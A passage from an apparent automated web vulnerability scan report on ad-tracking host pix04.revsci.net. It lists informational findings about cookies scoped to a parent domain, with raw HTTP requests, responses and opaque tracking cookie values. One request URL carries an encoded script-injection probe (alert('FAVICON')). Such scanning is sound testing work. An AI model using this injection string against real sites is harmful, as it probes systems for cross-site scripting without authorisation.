EwsIW30cEQxFMBFwQPy84ypcC3Zme7LW7+iUqdyAdjk2XGe+eLMBCYJtUljdJ6GqBnj+vl//7maBJSUlmqJ3hpC4ce/tJwxaLUfUY1x+nUo95WDfzrRjFlgrJ3xS6+iIIQeVaUhiti+0Cf5eWqLVV+gJE54oXJZkEyJf/sh/kPypmlG32nye5B4XqY5ZAJZXDpJ3QS9rd33I1Vhi6Y1siQdnFT4FCdvZ4R6SzfqmUppApCvr5VHfOQKovoVZagXyk9kuWNCpDBnkxwe3NGXSwYWRPWphnQeFjZJ4h+HR6U53q1Lvc3rPCP4VPxdPZDIqxISUC87tO5crzLyKK+tCDbhL10Y//Xo7+EhPwtM+S5opBVfgwYguoWga8oxUyoHshREvCTUP3Z05DSXeApPRNPZ62ZAxg4BwOYbIaVL9dwygmautbLyGu+K6mv94cUHiQYcr1RjWTE7vkegQWMpJFzB"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_m5HQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AVou=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF40OhOXMMpjaBv3Dh/hL8rsB4rOfq5QuYnPnKayViGymJW18v6kTo+UWdpq+vTE99BUTLoKtiYg2S0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zXzZlP3ivfC9uJamaWvpbVB00uRyoJCxN4S+wrXmLMg4jrl3qYhDnGjIcgy9gae6cIsXGbuaKjHszrakjzsrBpiP7b6XoVz93fCrKVSnf88GCgSUpNtkT3S15lc2CHhtu8XK1CbHiTE2fU4nj8xJSflN9dF95kDfmCkFTiqyCNwDj+Iwb7m77ukVX0rooAClrM1X1rdn6EG0US43kZKfvsJxw9ZAjl5vuOhGxBLkL0cswvQYaX4r0R4yrutEdJoUzjrMUZTfvke5cSSFsgmL/X+OB15fwGhGvqEgY6dNO0dLGM27qLym4/iwljctD2BrS27lPl1kmLoDTx9AHqSfxgQdqUffqDv7y2cZvCEkvenBU4TMjItTHq0az01AhtBiy6Pk7biH//O86aK5eUhLLyZzUihPdAKP+kndJdxRsPS2JTz38xelQS4B2CmJCdOFHw/yFRFTJeD2xB7vhJ5j0hl5J5yNIi7sA4Wtc3hiT0RGlo2A5x9Kl45d9l+a/IWbcu9J4Vl59+5WbEzVtDgsZnfa6X8vOB3Fa1ahJJ3HhhXP//zqg=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/
Set-Cookie: rtc_HXHk=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:33:35 GMT
Content-Length: 729

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['D10898_10008','D10898_50009'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

12.107. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/916907335.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNfEPF7gMQVVNGSXBLu+N09e4iyzUHYXzBFE1VBMg4+wLZJu3B5D/qNDdA7/IG7eVAV4cFPTEfYsNuO/7r68+Oz9i3bYhagy10tTmKmbVpGBg/vWbHRRVb7sEZ6QsY6gdHgg2s47sgz0G97xHNwkIFqosHoDy2sC6iIrWORd/ZDjLw/M8wiLJyJat86j0fqknm/avVqxtkIxy80dvt7Q==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/
rtc_78yf=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D10898/b3/0/3/1008211/916907335.js?D=DM_LOC%3Dhttp%253A%252F%252Fidolator.com%252Fwp-content2f889%252522%25253E%25253Cscript%25253Ealert(%252522FAVICON%252522)%25253C%252Fscript%25253Ed06b96a1bc7%252Fthemes%252Fidolator_1.5%252Fimages%252Ffavicon.ico%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26DM_EOM%3D1&C=D10898 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/ifb/audience-science.html
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; NETSEGS_K05540=d303c7ec11fd6a67&K05540&0&4e0bd851&0&&4de5e0dc&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; udm_0=MLvvNVUJLipnHZpEo7+SVRR18PhRKuEuJGzQLvt5qmcEJOBoCrOoRWdBcBKVIgXn3e/8vf7FHBfFwGfoaW93RjtnFCkbNwEm80k7P2BMZ/4uLjN+oiHkpY5VHzopFBOG+BkHiPvLWAzn6cEdsoxE1sNfHEt+9iwUsz1cMxer91I1WhrgKCP8rp91tqO5dH9cY8VwoPvNLLKrFR/61NHqFeoMlxuw7F/5Nrqg7eJenJv0o3CFntqNyPsidoJR5SDrrXCZv6RfnXs3yvNuhb5ZnnZIgeOKDWVsbkPDUNEhxu4JzHT/gfLROZPa9REfkBHn93TzZadayYLOaWDs7loqURNOa6h7jNzrciXfc+247X5Xy+mr9mi+opwYA+E2sc5NfvEqX/EInf/RKElL94ejffrdp1lHyFbIN85ruTv53TgsS9433Zu4l5iQWJwkIRRl4IS+tbRmOp/o6KdupS5813z4X6uOH49zPwBUOzzFA4epHD+MDZ3IKHNvdkWaxEZ096C7TKFmuxxt27m/Kn5eNZOR7NA7U7PrnVqdNNID6cwCOiyEQ8Q1HgFxSyY2AIXpJOoOSpqN6gN5FCmGRsjyhVZ9tQGhD4JyGJmBm7TmvI3a38vbUeYNkT0MB5sLgT9KKpfAzL2ejPL30XDxC+zE2Sz02V4ZVWUV7TdURcjgH9ryuYm4K3ZrEIC3YV1j0KXQiOU+/uQJKMy4EV6F66nZJC9QSMff3ReMECUNF04n3CnnCWaOFi6nJG57nzDuxYfiEf7gXCy1BxC45wNRu0Qx3pGZtXLtYSCHQ7uQ/ZBjyKwrq4sKUMRvDmr3DP380o1gTl7PjEuHBDg8LF1tA4C4tovy0YKXWuf9MRza1FGnlTWVGh4+XU8BsSCOpv+YAeTOfO/KcgCYXQwdqxSki3UyaVmDTPFIDggAQG/4xV9U+O+3aIRBvAryv5D8vB/3Jn0VfIAYjdX1p44Rbz0iSQr5WV4uPDh6ES38d+KwL3Z4y4+7FPiiYDcsIhs/VuTz2IGWZF/fiZsTZnjQotufIG2ybudelHSmLcY4; NETSEGS_F10933=d303c7ec11fd6a67&F10933&0&4e0bdb5a&0&&4de5f240&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsiPus_nuZz="MLuBMx4XBFpAElVHVRLHHxZUR1BQAlU4UhgBQkERUNUaUQIWcx23kp417rqtwlavGTS6f3+SucRNMUEJFgSkQpK116FK7qnDr0O2Wnf5E9NFc1HBdnU="; rsi_us_1000000="pUP1J02nfxIU1Q0ubprAUjWOSeKhW1riCY7htYfNgdgqkuJZU5HT2idHdEnlbFOhxTwmkjgUz7Nt88A2t396Fl2291QsLBBLaWT4PDm/LwNLG8r/XfrxYcsmTGZrsKLL1RjJzqr6+G9c2ZlAcqc5J7fWS/xp2Uyg8WHZ99rg67YyzlL0ibDA88VqzqvIl5qsQHDEDnp19AhC/8zbGTWfJRxGOMXQtKIvpVt9sjBbw4jSN8AHO2NzxK6J5DD56Lk1h0BYVCHdKVSg7OJo/KQumDit5FnevaGQ+BMzzw1gxuxoWcozsZQtCnYQOm63IpoPRzJYs2U6Su6YSHtWZLpaMjU1Tlr1rNYuSeTJGsi/3RK5cuDfLHM3I/c4SkxJmzct0g6nYz4RVEDoejoJH+7a2XOW+Dr7aKD4TWszgDjbtwPmAv0HBBm7CNI8kEMPj3aRSdFhtTrdJC+ZW4YEdng6WI0MIQ9h2tvJI+XspOFuC7stEoAjuw+Z19oGW7GZZp8Xgtlu3SkESb3LicfHx8xwHBhT7V/4KMDZ6THddrL7W7NWHoQ6Ek0Fo6w1JhJOgje4"; rsi_segs_1000000=pUPNfTPB7QMUFVJmHJYgmVOVD4ERy+rwUDANwbNpYgPEsvXZtVH4442ogxmXJQVbAcztAeTKvYlFwBk3qaSyXh8n/6eM1skzqwkS0v3wMeOyyNXWqQZ/X9T3cBLNCGS0MviEFDWUCYZQ3BpkbhDynzS6A1PBzL2QYIEH5QGxrngaa/yrklwCbQnIYFLpHtYQ; rtc_F8Ex=MLuBE48HgVlDFVRDdcKRB3R3EID5KgaJBK6wgus1ot/s44rq7AXzjuDE3GTRrOcsbkPi5uzdXFZkRdDlOaZwTN3r6e2Dcm68c/4wMwd3QYNyRg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_F8Ex=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AVou=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_m5HQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6fEI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNfEPF7gMQVVNGSXBLu+N09e4iyzUHYXzBFE1VBMg4+wLZJu3B5D/qNDdA7/IG7eVAV4cFPTEfYsNuO/7r68+Oz9i3bYhagy10tTmKmbVpGBg/vWbHRRVb7sEZ6QsY6gdHgg2s47sgz0G97xHNwkIFqosHoDy2sC6iIrWORd/ZDjLw/M8wiLJyJat86j0fqknm/avVqxtkIxy80dvt7Q==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/
Set-Cookie: rtc_78yf=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:33:59 GMT
Content-Length: 729

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['D10898_10008','D10898_50009'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

12.108. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/98295750.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5E+hOXMMpTaBv3Dh/hJU4xrMriQJSwsJSS2518p566AWsC6dZCCogy1fwjXjHJvVxCC5NyPuYuXxdU6jW0XnxxW5LaVCOktcrquTNuOWFTTkxfICGdlkVyCpK3b3iBtHZFHlC6tauUzkVsstlxUvHpxx6DjOYyhPvC5/ZjjhbqaES50QAhloD6YIsf2+FYRr0VuIwWQX4QMglVXTOe7YLEod92HudBfky4RL3Q239PgRK6oXAiPPaibO1jYM/Iz/kC/iihiL3rPthtLDeCHUZ3iH5dsjDx84V+C3xcXh455oXXiDJA+jeQPqSApTIk02czO7dpxnXVMEuNggt9rQ1n3YBmOEQT490yfGwKdC9wyySD2eInXvJI7TFlvjBdODqCSiBFUtVjWl6gKxWitgyWLkwKTtke7c9d/g8TWa+nRPnxb0dmeXqeTU+ES8BH0HuIbtXyrnUGRSOLCAE7iaUtfQ1qFqEzIUH3Mjn31mDjCdfCnjXPu45PRgweof1YCdlR8//I5+E0Y2aLwiTWDjpgMxu6Ut0+ebazQyKe2uAw/Vdofl0Icc4xApuNWcOA4lKLOVUj8vXZuLUEScdaDnMcicuqs1AU2EOJJtABY3UpLcODetKmmsZItjqo9Bx8HwAuF8B9F44lV3EsczCHrcngFfXCn66ogbuDw9D8wI; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/
rtc_LzCA=MLvH+QcJZzpn51KdVPOgNEq4ycXXNAyCN+LRv9fsONVfRqt6Qn35QexQL31IlbitPCMvDwBMAQWU4RBAwCEMoMFFT0t18ir5y2YIZKsVf4A1MyV5pIzguYiK8y+o8zbIRZrZ9xyanQeHqcRo9uARt2M2hUoJyA1o3PPpYvAgJnquuQOveNt+kyObkCyOeLVAQBx3JPcv81M4vRIMnRw0wo58TG2ePQWa50SMXHxvrRIInkvJS+F5enSqgTnBr71q81exva1eOKPUWKTIz4VpYRcalFe1tKQ25zvzgpgRN4p9y95tlJNo1dKcS8E9JQa/aIYcsgrgCeb9HaHv61V3YFjJdwoln4Pcqz6Zdpf3dF3pQAJRSPTBwdbK1yjIYZ1HnH8PlbazgcDaHXlBte9YvNOMF9LUsvTCO9OtmnXFvaIJ8gm7AxzpQ6H6c5peDD4hh50s/S6dyey0uJnVJNGB9mudh6gl4xhA1gAn9TG2VaHUlSg/MZN4N4eOF6oZrw8tLZu6cPeYYeCrpQj/T6CBFEEP7hELSVaqziK1Ig5F0M76EO9h7CFMB9DJO9u28jcej/u6pVe9w4w0OGPEHexnmazLoPwbBbQg3WfdPF2DkI+4om/DZL0Os8CJSMakm6OuP3nItB64r8sfMpstkr7tWQevuO79HqbZThGOYcZpCcZ2dnxoU2qse4nhXnastPwh+AHpTlQ2TViAXBB3Vb/oMHPx2YzUJ0e/8qcTnlDGFTkcJF+FiqbzfFBGT1XQoJ5tbCsJSNN/0bJJYeZsryNG+cphBle1M3pnHwWbE0Ac5F+wi3qpofX/i8o+JPCkR73+7fZXp4cD8o9TVaMVs+1H5+5WrHcapiPyXjo/2u88tqI8W1eGozRtFBR/GkDIJaU1sDbyaA5WJqdXZ8a/3qKUtRNyzp9rxoqF+XkRAX45pBDT73AqfhAExsM14sPXvi5NVHH28JIua4pKod9lltgJXBYFgD19HPxU0ZE1DzqTVnnZ+cmLIg3Y8xUvgthgARtmiJCss+deTAWmQg99bc5VAEgS7WlFYgBc65REKq1h42sTf632vhHfEbkuX7FO/kEPTjREzcmgEEmj6PfU+DqIGMWgmiUW7IJb2dvvA0jbfQH9cPxn4MATH+0y0Zb1m0wasEnPVxmvh/HR